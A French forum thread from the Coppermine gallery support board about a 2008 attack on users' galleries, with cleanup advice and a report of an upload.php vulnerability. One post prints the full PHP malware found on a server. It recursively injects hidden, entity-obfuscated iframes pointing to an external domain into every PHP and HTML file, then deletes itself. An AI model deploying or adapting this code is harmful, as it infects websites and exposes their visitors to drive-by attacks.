Galerie attaquée ? - Page 2 Galerie attaquée ? - Page 2
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Galerie attaquée ?

Started by mafieuso, April 07, 2008, 11:07:56 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

DavidG

en cherchant un peu sur le serveur, je viens de trouver dans le répertoire albums/userpics/10001 un fichier 142739_298w3.zip qui est en faite un fichier php

voici le contenu :

<?php 
function fileExtension($file) {
    
$fileExp explode('.'$file);
    
$filetype $fileExp[count($fileExp)-1];

return $filetype;
}

function 
parse($path) {
$dir_array = array();
if ($handle opendir($path)) {
while (false !== ($file readdir($handle))) { 
if ($file != "." && $file != "..") { 
$try_dir $path.$file.'/';
if(is_dir($try_dir)) {
array_push($dir_array$try_dir);
}
else {
if ($path[strlen($path)-1] != '/') {
$path.= '/';
}
$f_ext fileExtension($file);
if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
if($file!="debugger.inc.php") {
//chmod($path.$file,0777);
$fhandle fopen($path.$file'a+');
if($f_ext=="php") {
fwrite($fhandle"<?php echo '<iframe src=\"&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;\" width=1 height=1></iframe>'; ?>
");
}
else {
fwrite($fhandle, "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>");
}
fclose($fhandle);
}
}
}
}
}
closedir($handle);
}

return $dir_array;
}

function launch() {
$total = 0;
$last = 1;
$last_num = 0;
$path = $_SERVER['DOCUMENT_ROOT'];
$dirs = array();
array_push($dirs, $path);

while($last) {
$last_num = 0;
for( $j=$total; $j<$total+$last; $j++) {
$temp_dirs = parse($dirs[$j]);
$last_t = sizeof($temp_dirs);
$last_num += $last_t;
for( $i=0; $i<$last_t; $i++) {
array_push($dirs, $temp_dirs[$i]);
}
}
$total += $last;
$last = $last_num;
}
$paths = $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];
unlink($paths);

if (is_file($paths)) {
$fhandle = fopen($paths, 'w');
fwrite($fhandle, "<?php echo'Upload plugins here'?>");
fclose($fhandle);
}
}

if (isset($_GET['ff']))
{
echo "~!";
launch();
}
echo '<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>';
?>

Pascal YAP

#21
Bonjour,

Là on est tous d'accord, il y a un gros soucis de sécu !
La solution ultime consiste, hélas, à replacer des fichiers propres (Clean) !
N'oubliez pas de remplacer également vos fichiers de plugins, si vous en avez installé !


Il n'y a pas de solution logiciel actuellement....

Wait'n See ( attendre et voir)

PYAP

mafieuso

Ah oui j'avais oublié de signaler que j'avais aussi ce fichier zip, je l'ai supprimé sans regarder ce qu'il y avait dedans par peur d'une infection...

Coline

Et en le supprimant tu n'as eu aucun problème?
Je voulais savoir comment je fais pour tout remettre à jour en ayant un modded?
Je remet la mise à jour cpg1.4.16 puis le modded?
merci

mafieuso

Comme l'a dit Pascal YAP un peu plus haut il faut que tu remplaces les fichiers qui sont sur le FTP, tous les dossiers mis à part le dossier albums.

Si tu as une copie de tous ces fichiers sur ton pc avant l'attaque ça devrait être assez simple sinon il faut que tu télécharges la version que tu as sur le serveur et modifie les fichiers avant de tout retransférer.

Coline

J'ai remis la mise à jours cpg1.4.16.zip + le stramm_mod1_4_16_bridge.zip et j'ai toujours ce virus :(

becassier.29

Bon ben apparement la buse c'est faite aussi attaquée.

L'accès à ma galerie bugg, la mise en page est dans les choux, des albums semblent avoir disparus, mais peut être pas les photos.
Un membre m'avait signalé la présence d'un virus (dont je me rappelle plus le nom) à l'ouverture de la galerie. Cette après midi j'avais pu y aller, mais ce soir c'est dur dur. Pas moyen de m'identifier, ça bugg avant.

Très grosse galère pour moi à la mise en place de cette galerie, voilà que maintenant ça merdouille..................... :-\

:'(

sanlogik

vous me faites peur avé vos histoires là...
du coup sauvegarde "express" (façon de parler) des fichiers du serveur, lol

becassier.29

Pour mon cas j'a itélécharger récement une nouvelle version de Java Sun, Comme apparement Coppermine tourne avec ça le problème ne viendrait il pas de là?

mr.goose

Bonjour,

Pardon mon mauvais français, parce que je suis anglais. :) Mais nous avons le même problème ici:-
http://forum.coppermine-gallery.net/index.php/topic,51671.0.html

G.



DavidG

Merci pour l'info mr.goose.

Feerie21

Pour ma part tout semble être régler, jai remplacer tous les fichier par des fichier "propres". Supprimer le "fichier zip" qui avait été uploader et qui semplait être une des cause de ce big bug, activer l'inscription des utilisateur avant acces a la galerie. Et tout marche correctement pour le moment. Je croise les doigts pour que ca continue. Merci pour tous vos conseils en tout cas ;)

Coline

J'ai également tous enlevé (sauf album) et tous remis et le virus c'est envolé ouf! je suis soulagée

Feerie21

J'ai parler trop vite, maitenant il met impossible d'uploader un fichier que ce soit manuellement ou en passant par FTP.  ???

becassier.29

Des virus semblent être dans le update de la nouvelle version de java. Mon antivirus m'en sort a chaque voit que je tente de me connecter a ma galerie.

mafieuso

Quote from: Coline on April 09, 2008, 11:42:45 AM
J'ai également tous enlevé (sauf album) et tous remis et le virus c'est envolé ouf! je suis soulagée

Juste un petit détail dans chaque dossier d'images donc sous-dossiers de albums il y a normalement un fichier index.html qui est vide (juste pour éviter que quelqu'un se ballade dans le répertoire) or après l'attaque il y a dedans cette fameuse ligne de code bizarre, donc il si tu veux que ce soit complètement propre il te faut remplacer le index.html modifié par un fichier index.html vide (un simple fichier txt renommé fera l'affaire) dans chaque sous-dossier, c'est un peu long car il faut le faire manuellement mais bon ça vaut le coup à mon avis !

dorifort

bonjour à tous, jai subit le même sort sur l'une de mes galerie  :o bon je dois dire quant même que cette attaque et ce problème n'est pas du cas coppermine  ;) mais à tout un tas de galerie ou CMS utilisant du code, ce sont tous les fichier index.php qui sont touché, donc le seul reméde à faire c'est de remplacer tous les fichiers index.php de votre CMS ou de votre galerie photo et vérifier le dossier /albums/userpics/ dedans l'on trouve un dossier par exemple ici /10001/ il correspont au upload effectué pour la galerie à l'intérieur de celui il y à peut être un zip virer le  >:( voila ) un bon conseil aussi heureusement que j'avais installé le plugins de sauvegarde, une fois votre nettoyage fait tout reviens d'en l odre  ;)
comment sa viens la dedans ou comment il peuvent changer les fichier index.php de nos galerie ou CMS j'en sais rien du tout  :P

bonne fin de journéé à tous

Pascal YAP

#37
Quotece sont tous les fichier index.php qui sont touché
Exact !
Mais pour être plus précis encore, se sont hélas TOUS les fichiers qui sont modifiés !
Idem pour les HTML du site. Idem pour les Plugin de Coppermine...

Même le fichier CONFIG.INC.PHP est touché ??? Qui est rappelons-le le cœur de Coppermine !

Il faut remplacer tous les fichiers de vos sites. C'est l'occasion pour faire une mise à jour 1.4.16 actuellement.

Mr.Goose signale ce Sujet en anglais (http://forum.coppermine-gallery.net/index.php/topic,51671.0.html) dans lequel il signale la présence suspect d'un fichier ZIP nommé comme ceci : 142739_298w3.zip
Perso n'ai pas trouvé ce fichier sur mon serveur !

PYAP

dorifort

oui c'est bizarre, je viens aussi de poser la question sur le forum de guppy pour ce CMS on me dis faut le mettre à jour et que la faille étais connue, euh sauf que mon guppy était à jour au dernier crie, donc tu voi y à bien pour moi aussi des CMS qui sont touché  :-\ pour la galerie directement je me suis rendu ici pour voir si vous en parliez un peu  ;) encore des clowns qui non rien d'autre à faire que d'emmerder des gens qui vienne partager ici ou la l'une de leur petite passion grace à nos galerie   ;)
cordialement, alain

Pascal YAP

Une vulnérabilité dans le fichier UPLOAD.PHP a été déceller.
Le fix est en TEST actuellement.
Mais déjà, il est possible de ne pas proposer la fonction URL/URI dans votre Galerie.

PYAP